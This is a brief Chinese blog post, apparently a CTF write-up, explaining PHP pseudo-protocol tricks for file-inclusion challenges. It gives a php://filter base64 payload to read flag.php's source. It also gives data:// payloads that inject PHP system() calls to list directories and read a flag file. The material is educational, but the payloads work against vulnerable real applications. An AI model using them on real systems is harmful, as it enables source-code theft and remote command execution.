伪协议知识:php伪协议总结 - My_Dreams - 博客园
buuctf web include
点开tip后,url中含有flag,结合题目include,想到文件包含
payload:
php://filter/read=convert.base64-encode/resource=flag.php
php://filter/ 是一种访问本地文件的协议。
/read=convert.base64-encode/ 表示读取的方式是 base64 编码后。
resource=index.php 表示目标文件为index.php。
为什么要进行 base64 编码呢?如果不进行 base64 编码传入,index.php 就会直接执行,我们就看不到文件中的内容了。
文件包含学习:
ctf任意文件包含漏洞简单讲解含php伪协议及习题_伤心的小尾巴的博客-CSDN博客_ctf file php
攻防世界 Web_php_include
当过滤了php://的伪协议,我们可以使用data://伪协议
/?page=data://text/plain,<?php%20system("ls");%20?>
?page=data://text/plain,<?php%20system("cat%20fl4gisisish3r3.php")?>